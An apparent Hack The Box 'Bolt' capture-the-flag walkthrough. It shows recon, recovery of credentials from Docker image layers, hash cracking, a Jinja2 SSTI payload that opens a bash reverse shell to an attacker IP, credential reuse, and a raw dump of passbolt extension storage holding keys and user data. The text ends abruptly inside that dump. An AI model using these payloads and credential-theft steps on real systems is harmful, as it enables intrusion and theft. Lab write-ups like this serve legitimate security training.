Hack The Box

HackTheBox “Bolt” Walkthrough

Before touching a single tool, understand the goal: enumerate everything, trust nothing, and follow every thread. Every service is a potential entry point. Every file is a potential credential store. Every…

HackTheBox “Bolt” Walkthrough, figure 1

THE HACKER MINDSET

Before touching a single tool, understand the goal: enumerate everything, trust nothing, and follow every thread. Every service is a potential entry point. Every file is a potential credential store. Every misconfiguration is a potential privilege escalation. Bolt teaches you to chain multiple small weaknesses into full compromise.

PHASE 1 — RECONNAISSANCE

Step 1: Port Scan with Nmap

Command:
nmap -p 22,80,443 -sCV 10.129.15.45

Why: Before attacking anything, you need to know what’s running. Nmap with -sCV runs service detection (-sV) and default scripts (-sC) which fingerprint the software versions and pull metadata like TLS certificate subjects.

What we found:
- Port 22: OpenSSH 8.2p1 — SSH. Noted for later (potential login vector).
- Port 80: nginx 1.18.0 — A web server. First target.
- Port 443: nginx 1.18.0 with TLS — The certificate’s commonName is passbolt.bolt.htb.

HackTheBox “Bolt” Walkthrough, figure 2

Hacker mindset: The TLS certificate is gold. It reveals a virtual hostname (passbolt.bolt.htb) that wouldn’t be visible otherwise. Attackers always check TLS certs for subdomains.

Step 2: Add Virtual Hosts to /etc/hosts

Command:
echo “10.129.15.45 bolt.htb demo.bolt.htb mail.bolt.htb passbolt.bolt.htb” | sudo tee -a /etc/hosts

Why: The web server uses virtual hosting — it serves different sites depending on what Host: header you send. Without adding these to /etc/hosts, your browser and tools will send requests to the IP directly and get the wrong (or no) response. This maps the domain names to the target IP locally.

HackTheBox “Bolt” Walkthrough, figure 3

Hacker mindset: Always check for virtual hosts on web servers. One IP can host many sites, each with different vulnerabilities. The nmap cert leak gave us passbolt.bolt.htb for free; we guessed bolt.htb, demo.bolt.htb, and mail.bolt.htb from context clues in the writeup and the app itself.

PHASE 2 — WEB ENUMERATION

Step 3: Explore bolt.htb

HackTheBox “Bolt” Walkthrough, figure 4

Visiting http://bolt.htb/ shows a web design company landing page. The important things to look for:
- A Download button that leads to /download — the page offers a Docker image.
- A Login button.
- Chat messages on the admin dashboard (once logged in) hint that someone is worried about the Docker image leaking secrets.

Hacker mindset: Read everything on a page. Marketing fluff hides breadcrumbs. The internal chat about “scrubbing the Docker image” is a direct hint that the Docker image contains sensitive data.

Step 4: Download the Docker Image

HackTheBox “Bolt” Walkthrough, figure 5

Command:
wget http://bolt.htb/uploads/image.tar -O image.tar

Why: The site offers a Docker image for download. Docker images are layered filesystems — each layer is a snapshot of file changes. Old layers often contain deleted files, credentials, source code, and database files that were “cleaned up” from the final image but still exist in earlier ones.

HackTheBox “Bolt” Walkthrough, figure 6

Hacker mindset: Whenever you see a Docker image offered publicly, download and inspect it. Companies frequently make the mistake of building images iteratively, not realising that deleted files in later layers are still recoverable from earlier ones.

Step 5: Extract Credentials and Source Code from Docker Layers

Commands:
# Extract the layer containing the SQLite database
tar xf image.tar a4ea7da8de7bfbf327b56b0cb794aed9a8487d31e588b75029f6b527af2976f2/layer.tar

HackTheBox “Bolt” Walkthrough, figure 7

tar xf a4ea7da8…/layer.tar db.sqlite3

# Query the database
sqlite3 db.sqlite3 “select * from User;”
Result: 1|admin|admin@bolt.htb|$1$sm1RceCh$rSd3PygnS/6jlFDfF2J5q.||

HackTheBox “Bolt” Walkthrough, figure 8

# Extract the Flask application source
tar xf image.tar 41093412e0da959c80875bb0db640c1302d5bcdffec759a3a5670950272789ad/layer.tar
tar xf 41093412…/layer.tar — wildcards ‘*.py’

HackTheBox “Bolt” Walkthrough, figure 9

# Find the invite code
grep -r ‘invite_code’ app/
Result: if code != ‘XNSS-HSJW-3NGU-8XTJ’:

Why:
- The db.sqlite3 file was added in an early layer and later deleted — but it’s still recoverable. It contains the admin user’s password hash.
- The Flask source code reveals how the registration system works, including a hardcoded invite code check.

HackTheBox “Bolt” Walkthrough, figure 10

Hacker mindset: Think of Docker layers like git history, you can see everything that was ever there, not just the final state. Tools like dive make this visual, but raw tar extraction works fine once you know which layer to target.

Step 6: Crack the Admin Hash

Commands:
echo ‘$1$sm1RceCh$rSd3PygnS/6jlFDfF2J5q.’ > admin.hash
hashcat -m 500 admin.hash /usr/share/wordlists/rockyou.txt
Result: deadbolt

Why: The hash format $1$… is md5crypt (hashcat mode 500). Rockyou is the standard wordlist for HTB boxes. Mode 500 is fast enough to crack weak passwords in seconds.

HackTheBox “Bolt” Walkthrough, figure 11

Hacker mindset: Never store a hash without trying to crack it. Cracked passwords are often reused elsewhere. Even if this one only works on the demo dashboard, it might also work on SSH, other users, or the mail server.

PHASE 3 — GAINING A FOOTHOLD (SSTI)

Step 7: Log into bolt.htb

Visit http://bolt.htb/login and log in with admin:deadbolt. The dashboard shows an internal chat where employees discuss the Docker image potentially leaking secrets, confirming our earlier find.

HackTheBox “Bolt” Walkthrough, figure 12

Hacker mindset: Authenticated access means more attack surface. Read everything the application exposes, admin dashboards, chat logs, settings pages. They often leak information about other systems and users.

Step 8: Register on demo.bolt.htb

Visit http://demo.bolt.htb/register and fill in:
- Username: anything
- Email: anything@bolt.htb
- Password: anything@123
- Invite Code: XNSS-HSJW-3NGU-8XTJ

HackTheBox “Bolt” Walkthrough, figure 13

Why: The invite code was hardcoded in the Flask source we extracted from the Docker image. The demo site is a separate Flask application with its own user database. Using the same credentials, also log in to http://mail.bolt.htb (Roundcube webmail).

HackTheBox “Bolt” Walkthrough, figure 14

Hacker mindset: Information from one part of the attack always feeds the next. The Docker image gave us the source code; the source code gave us the invite code; the invite code gave us access to the demo and mail apps. This is the chain.

Step 9: Server-Side Template Injection (SSTI)

What is SSTI?
Flask uses the Jinja2 template engine to render HTML. If user input is passed directly into render_template_string() without sanitisation, the template engine processes it as code. An attacker can inject template expressions like {{ 7*7 }} and the server will evaluate them — giving remote code execution.

How we found it:
In the Docker source code, app/home/routes.py imported render_template_string and used it with the user’s profile_update field — the Name field in the profile settings.

The attack flow:
1. Start a netcat listener on Kali: nc -lvnp 4444

HackTheBox “Bolt” Walkthrough, figure 15

2. Log into http://demo.bolt.htb/admin/profile
3. Set the Name field to the SSTI reverse shell payload:
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen(‘/bin/bash -c “/bin/bash -i >& /dev/tcp/10.10.16.84/4444 0>&1”’).read() }}

HackTheBox “Bolt” Walkthrough, figure 16

4. Click Submit, this triggers an email to the registered address
5. Log into http://mail.bolt.htb and click the confirmation link in the first email

HackTheBox “Bolt” Walkthrough, figure 17

6. A second confirmation email arrives.

HackTheBox “Bolt” Walkthrough, figure 18

7. The second confirmation triggers the SSTI payload execution on the server

Why two emails?
The app sends a “please confirm your change” email. Clicking that link triggers the actual profile update, which calls render_template_string() with the injected payload — executing the reverse shell.

Result: Shell as www-data

www-data@bolt:~/demo$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

HackTheBox “Bolt” Walkthrough, figure 19

Hacker mindset: SSTI is dangerous because it looks like innocent user input. Developers often add template rendering for personalisation (like “Hello, {name}!”) without realising user input becomes code. Always test profile fields and any place where your text is reflected back in an email or page with template syntax.

PHASE 4 — LATERAL MOVEMENT TO EDDIE

Step 10: Find Database Credentials

As www-data, look at the web application config files:

cat /etc/passbolt/passbolt.php

This reveals the passbolt database credentials:
‘username’ => ‘passbolt’,
‘password’ => ‘rT2;jW7<eY8!dX8}pQ8%’,
‘database’ => ‘passboltdb’,

HackTheBox “Bolt” Walkthrough, figure 20

Why: Web applications must store their database credentials somewhere on disk. Config files in /etc/, /var/www/, or the app root are the first places to look. www-data can read /etc/passbolt/ because the web server needs these credentials to run.

Hacker mindset: Credentials in config files are often reused for system users. Always try found passwords against every user on the system.

Step 11: Switch to User eddie

Command:
su — eddie
Password: rT2;jW7<eY8!dX8}pQ8%
cat ~/user.txt

HackTheBox “Bolt” Walkthrough, figure 21

Why it worked: The system user eddie reused the passbolt database password as their Linux login password. This is a classic misconfiguration, developers set up a service with a password and then use the same password for their own account for convenience.

User flag captured.

PHASE 5 — PRIVILEGE ESCALATION TO ROOT

Step 12: Read eddie’s Mail

Command:
cat /var/mail/eddie

There’s an email from clark telling eddie to use passbolt (a PGP-based password manager browser extension) and to back up his private key. This is the roadmap for escalation.

HackTheBox “Bolt” Walkthrough, figure 22

Hacker mindset: Mail files are always worth reading. They reveal what the user is doing, what systems they interact with, and often contain credentials or clues.

Step 13: Find the PGP Private Key in Chrome Extension Storage

Passbolt stores the PGP private key in the Chrome extension’s local storage (a LevelDB database):

Command:
strings “/home/eddie/.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log” | grep -A 100 ‘BEGIN PGP PRIVATE’

HackTheBox “Bolt” Walkthrough, figure 23
eddie@bolt:~$ strings "/home/eddie/.config/google-chrome/Default/Local Extension Settings/didegimhafipceonhjepacocaffmoppf/000003.log" | grep -A 100 'BEGIN PGP PRIVATE'<moppf/000003.log" | grep -A 100 'BEGIN PGP PRIVATE'Q{"config":{"debug":false,"log":{"console":false,"level":0},"user.firstname":"Eddie","user.id":"4e184ee6-e436-47fb-91c9-dccb57f250bc","user.lastname":"Johnson","user.settings.securityToken.code":"GOZ","user.settings.securityToken.color":"#607d8b","user.settings.securityToken.textColor":"#ffffff","user.settings.trustedDomain":"https://passbolt.bolt.htb","user.username":"eddie@bolt.htb"},"passbolt-private-gpgkeys":"{\"MY_KEY_ID\":{\"key\":\"[Redacted: PGP private-key material from the authorized lab has been removed from this archive.]\\r\\n\",\"keyId\":\"dc3b4abd\",\"userIds\":[{\"name\":\"Eddie Johnson\",\"email\":\"eddie@bolt.htb\"}],\"fingerprint\":\"df426bc7a4a8af58e50eda0e1c2741a3dc3b4abd\",\"created\":\"Thu Feb 25 2021 14:49:21 GMT-0700 (Mountain Standard Time)\",\"expires\":\"Never\",\"algorithm\":\"rsa_encrypt_sign\",\"length\":2048,\"private\":true,\"user_id\":\"MY_KEY_ID\"}}","passbolt-public-gpgkeys":"{\"ba192ac8-99c0-3c89-a36f-a6094f5b9391\":{\"key\":\"-----BEGIN PGP PUBLIC KEY BLOCK-----\\r\\nVersion: OpenPGP.js v4.10.9\\r\\nComment: https://openpgpjs.org\\r\\n\\r\\nxsDNBGA2peUBDADHDueSrCzcZBMgt9GzuI4x57F0Pw922++n/vQ5rQs0A3Cm\\r\\nof6BH+H3sJkXIVlvLF4pygGyYndMMQT3NxZ84q32dPp2DKDipD8gA4ep9RAT\\r\\nIC4seXLUSTgRlxjB//NZNrAv35cHjb8f2hutHGYdigUUjB7SGzkjHtd7Ixbk\\r\\nLxxRta8tp9nLkqhrPkGCZRhJQPoolQQec2HduK417aBXHRxOLi6Loo2DXPRm\\r\\nDAqqYIhP9Nkhy27wL1zz57Fi0nyPBWTqA/WAEbx+ud575cJKHM7riAaLaK0s\\r\\nhuN12qJ7vEALjWY2CppEr04PLgQ5pj48Asly4mfcpzztP2NdQfZrFHe/JYwH\\r\\nI0zLDA4ZH4E/NK7HhPWovpF5JNK10tI16hTmzkK0mZVs8rINuB1b0uB0u3FP\\r\\n4oXfBuo6V5HEhZQ/H+YKyxG8A3xNsMTW4sy+JOw3EnJQT3O4S/ZR14+42nNt\\r\\nP+PbpxTgChS0YoLkRmYVikfFZeMgWl2L8MyqbXhvQlKb/PMAEQEAAc0kUGFz\\r\\nc2JvbHQgU2VydmVyIEtleSA8YWRtaW5AYm9sdC5odGI+wsElBBMBCgA4FiEE\\r\\nWYYKJp6AP6CUQWdTq44u+1ahbIQFAmA2peUCGwMFCwkIBwIGFQoJCAsCBBYC\\r\\nAwECHgECF4AAIQkQq44u+1ahbIQWIQRZhgomnoA/oJRBZ1Orji77VqFshPZa\\r\\nDACcb7OIZ5YTrRCeMrB/QRXwiS8p1SBHWZbzCwVTdryTH+9d2qKuk9cUF90I\\r\\ngTDNDwgWhcR+NAcHvXVdp3oVs4ppR3+RrGwA0YqVUuRogyKzVvtZKWBgwnJj\\r\\nULJiBG2OkxXzrY9N/4hCHJMliI9L4yjf0gOeNqQa9fVPk8C73ctKglu75ufe\\r\\nxTLxHuQc021HMWmQt+IDanaAY6aEKF0b1L49XuLe3rWpWXmovAc6YuJBkpGg\\r\\na/un/1IAk4Ifw1+fgBoGSQEaucgzSxy8XimUjv9MVNX01P/C9eU/149QW5r4\\r\\naNtabc2S8/TDDVEzAUzgwLHihQyzetS4+Qw9tbAQJeC6grfKRMSt3LCx1sX4\\r\\nP0jFHFPVLXAOtOiCUAK572iD2lyJdDsLs1dj4H/Ix2AV/UZe/G0qpN9oo/I+\\r\\nvC86HzDdK2bPu5gMHzZDI30vBCZR+S68sZSBefpjWeLWaGdtfdfK0/hYnDIP\\r\\neTLXDwBpLFklKpyi2HwnHYwB7YX/RiWgBffOwM0EYDal5QEMAJJNskp8LuSU\\r\\n3YocqmdLi9jGBVoSSzLLpeGt5HifVxToToovv1xP5Yl7MfqPdVkqCIbABNnm\\r\\noIMj7mYpjXfp659FGzzV0Ilr0MwK0sFFllVsH6beaScKIHCQniAjfTqCMuIb\\r\\n3otbqxakRndrFI1MNHURHMpp9gc2giY8Y8OsjAfkLeTHgQbBs9SqVbQYK0d1\\r\\njTKfAgYRkjzvp6mbLMaMA3zE9joa+R0XFFZlbcDR1tBPkj9eGK0OM1SMkU/p\\r\\nxTx6gyZdVYfV10n41SJMUF/Nir5tN1fwgbhSoMTSCm6zuowNU70+VlMx4TuZ\\r\\nRkXI2No3mEFzkw1sg/U3xH5ZlU/BioNhizJefn28kmF+801lBDMCsiRpW1i8\\r\\ncnr5U2D5QUzdj8I1G8xkoC6S6GryOeccJwQkwI9SFtaDQQQLI0b3F6wV32fE\\r\\n21nq2dek7/hocGpoxIYwOJRkpkw9tK2g8betT4OjHmVkiPnoyWo9do8g0Bzd\\r\\nNBUlP7GHXM/t605MdK9ZMQARAQABwsENBBgBCgAgFiEEWYYKJp6AP6CUQWdT\\r\\nq44u+1ahbIQFAmA2peUCGwwAIQkQq44u+1ahbIQWIQRZhgomnoA/oJRBZ1Or\\r\\nji77VqFshCbkC/9mKoWGFEGCbgdMX3+yiEKHscumFvmd1BABdc+BLZ8RS2D4\\r\\ndvShUdw+gf3m0Y9O16oQ/a2kDQywWDBC9kp3ByuRsphu7WnvVSh5PM0quwCK\\r\\nHmO+DwPJyw7Ji+ESRRCyPIIZImZrPYyBsJtmVVpjq323yEuWBB1l5NyflL5I\\r\\nLs9kncyEc7wNb5p1PEsui/Xv7N5HRocp1ni1w5k66BjKwMGnc48+x1nGPaP0\\r\\n4LYAjomyQpRLxFucKtx8UTa26bWWe59BSMGjND8cGdi3FiWBPmaSzp4+E1r0\\r\\nAJ2SHGJEZJXIeyASrWbvXMByxrVGgXBR6NHfl5e9rGDZcwo0R8LbbuACf7/F\\r\\nsRIKSwmIaLpmsTgEW9d8FdjM6Enm7nCObJnQOpzzGbHbIMxySaCso/eZDX3D\\r\\nR50E9IFLqf+Au+2UTUhlloPnIEcp7xV75txkLm6YUAhMUyLn51pGsQloUZ6L\\r\\nZ8gbvveCudfCIYF8cZzZbCB3vlVkPOBSl6GwOg9FHAVS0jY=\\r\\n=FBUR\\r\\n-----END PGP PUBLIC KEY BLOCK-----\\r\\n\",\"keyId\":\"56a16c84\",\"userIds\":[{\"name\":\"Passbolt Server Key\",\"email\":\"admin@bolt.htb\"}],\"fingerprint\":\"59860a269e803fa094416753ab8e2efb56a16c84\",\"created\":\"Wed Feb 24 2021 12:15:49 GMT-0700 (Mountain Standard Time)\",\"expires\":\"Never\",\"algorithm\":\"rsa_encrypt_sign\",\"length\":3072,\"private\":false,\"user_id\":\"ba192ac8-99c0-3c89-a36f-a6094f5b9391\"},\"4e184ee6-e436-47fb-91c9-dccb57f250bc\":{\"key\":\"-----BEGIN PGP PUBLIC KEY BLOCK-----\\r\\nVersion: OpenPGP.js v4.10.9\\r\\nComment: https://openpgpjs.org\\r\\n\\r\\nxsBNBGA4G2EBCADbpIGoMv+O5sxsbYX3ZhkuikEiIbDL8JRvLX/r1KlhWlTi\\r\\nfjfUozTU9a0OLuiHUNeEjYIVdcaAR89lVBnYuoneAghZ7eaZuiLz+5gaYczk\\r\\ncpRETcVDVVMZrLlW4zhA9OXfQY/d4/OXaAjsU9w+8ne0A5I0aygN2OPnEKhU\\r\\nRNa6PCvADh22J5vD+/RjPrmpnHcUuj+/qtJrS6PyEhY6jgxmeijYZqGkGeWU\\r\\n+XkmuFNmq6km9pCw+MJGdq0b9yEKOig6/UhGWZCQ7RKU1jzCbFOvcD98YT9a\\r\\nIf70XnI0xNMS4iRVzd2D4zliQx9d6BqEqZDfZhYpWo3NbDqsyGGtbyJlABEB\\r\\nAAHNHkVkZGllIEpvaG5zb24gPGVkZGllQGJvbHQuaHRiPsLAjQQQAQgAIAUC\\r\\nYDgbYQYLCQcIAwIEFQgKAgQWAgEAAhkBAhsDAh4BACEJEBwnQaPcO0q9FiEE\\r\\n30Jrx6Sor1jlDtoOHCdBo9w7Sr35DQf9HZOFYE3yug2TuEJY7q9QfwNrWhfJ\\r\\nHmOwdM1kCKV5XnBic356DF/ViT3+pcWfIbWT8giYIZ/2qYfAd74S+gMKBim8\\r\\nwBAH0J7WcnUI+py/zXxapGxBF0ufJtqrHmPaKsNaQVCEV3dDzTqlVRi0vfOD\\r\\nCm6kt3E8f8GPYK9Mh21gPjnhoPE1s23NzmBUiDt6wjZ2dOQ2cVagVnf6PyHM\\r\\nWZLqUm8nQY342t3+AA6SFTw/YpwPPvjtZBBHf95BrSbpCE5Bjar9UyB+14x6\\r\\nOUcWhkJu7QgySrCwAg2aKIBzsfWovcVTe9Rkpq/ty1tYOklT9kn75D9ttDF4\\r\\nU8+Qz61kTICf987ATQRgOBthAQgAmlgcw3DqVzEBa5k9djPsUTJWOKVY5uox\\r\\noBp6X0H9njR9Ufb2XtmxZUUdV/uhtbnM0lSlNkeNNBX4c/Qny88vfkgb66xc\\r\\noOo4q+fNCEZfCmcS2AwMsUlzaPDQjowp4V+mWSc8JXq4GXOd/mrooibtiEdt\\r\\nvK4pzMdvwGCykFqugyRDLksc1hfDYU+s5R42TNiMdW7OwYAplnOjgExOH8f1\\r\\nlXVkqbsq5p54TbHe+0SdlfH5pJf4Gfwqj6dQlkSf3DMeEnByxEZX3imeKGrC\\r\\nUmwLN4NHMeUs5EXuLnufut9aTMhbw/tetTtUXTHFk/zc7EhZDR1d3mkDV83c\\r\\ntEUh6BuElwARAQABwsB2BBgBCAAJBQJgOBthAhsMACEJEBwnQaPcO0q9FiEE\\r\\n30Jrx6Sor1jlDtoOHCdBo9w7Sr3+HQf/Qhrj6znyGkLbj9uUv0S1Q5fFx78z\\r\\n5qEXRe4rvFC3APYE8T5/AzW7XWRJxRxzgDQB5yBRoGEuL49w4/UNwhGUklb8\\r\\nIOuffRTHMPZxs8qVToKoEL/CRpiFHgoqQ9dJPJx1u5vWAX0AdOMvcCcPfVjc\\r\\nPyHN73YWejb7Ji82CNtXZ1g9vO7D49rSgLoSNAKghJIkcG+GeAkhoCeU4BjC\\r\\n/NdSM65Kmps6XOpigRottd7WB+sXpd5wyb+UyptwBsF7AISYycPvStDDQESg\\r\\npmGRRi3bQP6jGo1uP/k9wye/WMD0DrQqxch4lqCDk1n7OFIYlCSBOHU0rE/1\\r\\ntD0sGGFpQMsI+Q==\\r\\n=+pbw\\r\\n-----END PGP PUBLIC KEY BLOCK-----\\r\\n\",\"keyId\":\"dc3b4abd\",\"userIds\":[{\"name\":\"Eddie Johnson\",\"email\":\"eddie@bolt.htb\"}],\"fingerprint\":\"df426bc7a4a8af58e50eda0e1c2741a3dc3b4abd\",\"created\":\"Thu Feb 25 2021 14:49:21 GMT-0700 (Mountain Standard Time)\",\"expires\":\"Never\",\"algorithm\":\"rsa_encrypt_sign\",\"length\":2048,\"private\":false,\"user_id\":\"4e184ee6-e436-47fb-91c9-dccb57f250bc\"}}"}auth_status.{"isAuthenticated":true,"isMfaRequired":false}Troles[{"created":"2012-07-04T13:39:25+00:00","description":"Super Administrator","id":"0bfa69ec-8dde-4984-b9e7-4dc37fdec27c","modified":"2012-07-04T13:39:25+00:00","name":"root"},{"created":"2012-07-04T13:39:25+00:00","description":"Non logged in user","id":"10b6aca4-67a8-401e-b3b8-9ee0570bbb17","modified":"2012-07-04T13:39:25+00:00","name":"guest"},{"created":"2012-07-04T13:39:25+00:00","description":"Logged in user","id":"1cfcd300-0664-407e-85e6-c11664a7d86c","modified":"2012-07-04T13:39:25+00:00","name":"user"},{"created":"2012-07-04T13:39:25+00:00","description":"Organization administrator","id":"975b9a56-b1b1-453c-9362-c238a85dad76","modified":"2012-07-04T13:39:25+00:00","name":"admin"}]mresourceTypes[{"created":"2021-02-25T21:40:29+00:00","definition":{"resource":{"properties":{"description":{"anyOf":[{"maxLength":10000,"type":"string"},{"type":"null"}]},"name":{"maxLength":64,"type":"string"},"uri":{"anyOf":[{"maxLength":1024,"type":"string"},{"type":"null"}]},"username":{"anyOf":[{"maxLength":64,"type":"string"},{"type":"null"}]}},"required":["name"],"type":"object"},"secret":{"maxLength":4064,"type":"string"}},"description":"The original passbolt resource type, where the secret is a non empty string.","id":"669f8c64-242a-59fb-92fc-81f660975fd3","modified":"2021-02-25T21:40:29+00:00","name":"Simple password","slug":"password-string"},{"created":"2021-02-25T21:40:29+00:00","definition":{"resource":{"properties":{"name":{"maxLength":64,"type":"string"},"uri":{"anyOf":[{"maxLength":1024,"type":"string"},{"type":"null"}]},"username":{"anyOf":[{"maxLength":64,"type":"string"},{"type":"null"}]}},"required":["name"],"type":"object"},"secret":{"properties":{"description":{"anyOf":[{"maxLength":10000,"type":"string"},{"type":"null"}]},"password":{"maxLength":4064,"type":"string"}},"required":["password"],"type":"object"}},"description":"A resource with the password and the description encrypted.","id":"a28a04cd-6f53-518a-967c-9963bf9cec51","modified":"2021-02-25T21:40:29+00:00","name":"Password with description","slug":"password-and-description"}]{4 resourcesgroupsusers[{"active":true,"created":"2021-02-25T21:42:50+00:00","deleted":false,"id":"4e184ee6-e436-47fb-91c9-dccb57f250bc","last_logged_in":"2021-02-25T21:49:39+00:00","modified":"2021-02-25T21:49:38+00:00","profile":{"avatar":{"url":{"medium":"img/avatar/user_medium.png","small":"img/avatar/user.png"}},"created":"2021-02-25T21:42:50+00:00","first_name":"Eddie","id":"13d7b7c4-917e-48ee-9560-f022c89b2895","last_name":"Johnson","modified":"2021-02-25T21:42:50+00:00","user_id":"4e184ee6-e436-47fb-91c9-dccb57f250bc"},"role_id":"1cfcd300-0664-407e-85e6-c11664a7d86c","username":"eddie@bolt.htb"},{"active":true,"created":"2021-02-25T21:40:29+00:00","deleted":false,"id":"9d8a0452-53dc-4640-b3a7-9a3d86b0ff90","last_logged_in":"2021-02-25T21:41:47+00:00","modified":"2021-02-25T21:42:32+00:00","profile":{"avatar":{"created":"2021-02-25T21:42:32+00:00","id":"3cbdcc78-5d89-4a7a-92e2-4dc1e63b7da3","modified":"2021-02-25T21:42:32+00:00","url":{"medium":"img/public/Avatar/38/a2/10/3cbdcc785d894a7a92e24dc1e63b7da3/3cbdcc785d894a7a92e24dc1e63b7da3.a99472d5.jpg","small":"img/public/Avatar/38/a2/10/3cbdcc785d894a7a92e24dc1e63b7da3/3cbdcc785d894a7a92e24dc1e63b7da3.65a0ba70.jpg"}},"created":"2021-02-25T21:40:29+00:00","first_name":"Clark","id":"99cfb365-869d-42ec-9f6e-6883e7e41b4f","last_name":"Griswold","modified":"2021-02-25T21:42:32+00:00","user_id":"9d8a0452-53dc-4640-b3a7-9a3d86b0ff90"},"role_id":"975b9a56-b1b1-453c-9362-c238a85dad76","username":"clark@bolt.htb"}] resources[{"created":"2021-02-25T21:50:11+00:00","created_by":"4e184ee6-e436-47fb-91c9-dccb57f250bc","deleted":false,"description":null,"favorite":null,"id":"cd0270db-c83f-4f44-b7ac-76609b397746","modified":"2021-02-25T21:50:11+00:00","modified_by":"4e184ee6-e436-47fb-91c9-dccb57f250bc","name":"localhost","permission":{"aco":"Resource","aco_foreign_key":"cd0270db-c83f-4f44-b7ac-76609b397746","aro":"User","aro_foreign_key":"4e184ee6-e436-47fb-91c9-dccb57f250bc","created":"2021-02-25T21:50:11+00:00","id":"2627a60d-85d5-4df6-b94d-60c6b32fc525","modified":"2021-02-25T21:50:11+00:00","type":15},"resource_type_id":"a28a04cd-6f53-518a-967c-9963bf9cec51","uri":"","username":"root"}]_passbolt_dataQ{"config":{"log":{"console":false,"level":0},"user.firstname":"Eddie","user.id":"4e184ee6-e436-47fb-91c9-dccb57f250bc","user.lastname":"Johnson","user.settings.securityToken.code":"GOZ","user.settings.securityToken.color":"#607d8b","user.settings.securityToken.textColor":"#ffffff","user.settings.trustedDomain":"https://passbolt.bolt.htb","user.username":"eddie@bolt.htb"},"passbolt-private-gpgkeys":"{\"MY_KEY_ID\":{\"key\":\"[Redacted: PGP private-key material from the authorized lab has been removed from this archive.]\\r\\n\",\"keyId\":\"dc3b4abd\",\"userIds\":[{\"name\":\"Eddie Johnson\",\"email\":\"eddie@bolt.htb\"}],\"fingerprint\":\"df426bc7a4a8af58e50eda0e1c2741a3dc3b4abd\",\"created\":\"Thu Feb 25 2021 14:49:21 GMT-0700 (Mountain Standard Time)\",\"expires\":\"Never\",\"algorithm\":\"rsa_encrypt_sign\",\"length\":2048,\"private\":true,\"user_id\":\"MY_KEY_ID\"}}","passbolt-public-gpgkeys":"{\"ba192ac8-99c0-3c89-a36f-a6094f5b9391\":{\"key\":\"-----BEGIN PGP PUBLIC KEY BLOCK-----\\r\\nVersion: OpenPGP.js v4.10.9\\r\\nComment: https://openpgpjs.org\\r\\n\\r\\n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\\r\\nLs9kn